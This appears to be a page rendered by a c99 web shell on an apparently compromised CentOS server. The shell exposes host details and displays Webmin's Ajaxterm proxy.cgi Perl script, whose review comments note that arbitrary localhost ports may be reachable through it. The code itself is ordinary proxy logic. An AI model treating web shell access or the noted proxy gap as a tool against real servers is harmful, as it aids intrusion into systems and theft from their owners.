!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/ajaxterm/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)


Viewing file:     proxy.cgi (1.65 KB)      -rwxr-xr-x
#!/usr/bin/perl
# Proxy an Ajaxterm request to the real port

BEGIN { push(@INC, ".."); };
use WebminCore;

# Since this script is run on every keypress, init_config is intentionally
# not called to reduce startup time.
#&init_config();

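# Parse the target port and the remaining request path out of PATH_INFO,
# which is expected to look like /<port><path>. The port is taken straight
# from the request URL and is the only thing that selects which service on
# localhost this script connects to, so it is limited to a usable TCP port.
# NOTE(review): nothing visible in this script ties the port to an Ajaxterm
# instance started by this module, so any port listening on localhost appears
# reachable through this proxy - confirm whether an allow-list is needed.
# NOTE(review): init_config is deliberately not called above; whatever
# per-request checks it performs are presumably skipped as well - confirm.
$ENV{'PATH_INFO'} =~ /^\/(\d+)(.*)$/ ||
    &error("Missing or invalid PATH_INFO");
$port = $1;
$path = $2;

# Reject port 0 and anything above 65535 before any connection is attempted
($port >= 1 && $port <= 65535) ||
    &error("Missing or invalid PATH_INFO");

# The path is placed on the upstream request line, and "." in the pattern
# above still matches a carriage return, so refuse embedded line breaks
($path !~ /[\r\n]/) ||
    &error("Missing or invalid PATH_INFO");

# Autoflush output, so proxied data is written as soon as it is printed
$| = 1;
$meth = $ENV{'REQUEST_METHOD'};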

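# CONTENT_LENGTH and CONTENT_TYPE are copied into the upstream request
# headers below. Check them before connecting: the length must be purely
# numeric and the type must not contain line breaks, since either could
# otherwise add extra header lines to the proxied request.
$cl = $ENV{'CONTENT_LENGTH'};
if (defined($cl) && $cl ne "" && $cl !~ /^\d+\z/) {
        &error("Invalid Content-Length");
        }
if ($ENV{'CONTENT_TYPE'} && $ENV{'CONTENT_TYPE'} =~ /[\r\n]/) {
        &error("Invalid Content-Type");
        }

# Connect to the Ajaxterm server on localhost and replay the incoming
# request: request line, fixed Host and User-agent headers, then the body
# headers and the body itself.
$con = &make_http_connection("localhost", $port, 0, $meth, $path);
&error($con) if (!ref($con));   # a non-reference result is passed to error()
&write_http_connection($con, "Host: localhost\r\n");
&write_http_connection($con, "User-agent: Webmin\r\n");
&write_http_connection($con, "Content-length: $cl\r\n") if ($cl);
&write_http_connection($con, "Content-type: $ENV{'CONTENT_TYPE'}\r\n")
        if ($ENV{'CONTENT_TYPE'});
&write_http_connection($con, "\r\n");
if ($cl) {
        # NOTE(review): the whole request body is buffered in $post and the
        # length is not capped here - confirm the web server bounds it.
        &read_fully(STDIN, \$post, $cl);
        &write_http_connection($con, $post);
        }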

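# Read back the response headers. The first line read (the upstream status
# line) is stored in $dummy and never used, so the upstream status code is
# not relayed to the client.
$dummy = &read_http_connection($con);
while(1) {
        # Strip CR and LF so each relayed header is exactly one line
        ($headline = &read_http_connection($con)) =~ s/\r|\n//g;
        last if (!$headline);   # blank line (or nothing read) ends the headers
        # Split at the first colon. Whitespace after the colon is optional in
        # HTTP, so a header written as "Name:value" is accepted rather than
        # aborting the response with "Bad header".
        $headline =~ /^([^:\s]+):\s*(.*)$/ || &error("Bad header");
        $header{lc($1)} = $2;
        $headers .= $headline."\n";
        }
# Emit the collected headers followed by the blank line that ends them
print $headers,"\n";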

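# Relay the response body, asking for 1024 at a time. The loop tests for an
# undefined or empty read instead of plain truth: a final chunk consisting of
# the single character "0" is false in Perl and would otherwise end the copy
# early and drop that byte.
while(defined($buf = &read_http_connection($con, 1024)) && length($buf)) {
        print $buf;
        }
&close_http_connection($con);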

# Refresh the per-port status file under WEBMIN_VAR/ajaxterm to indicate that
# this terminal is still running. The directory is created with mode 0700
# if it does not exist yet.
my $var_dir = $ENV{'WEBMIN_VAR'};
$statusdir = $var_dir."/ajaxterm";
&make_dir($statusdir, 0700) unless (-d $statusdir);
# $port was matched as digits only, so it cannot add path components here
&open_tempfile(TOUCH, ">$statusdir/$port", 0, 1);
&close_tempfile(TOUCH);


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--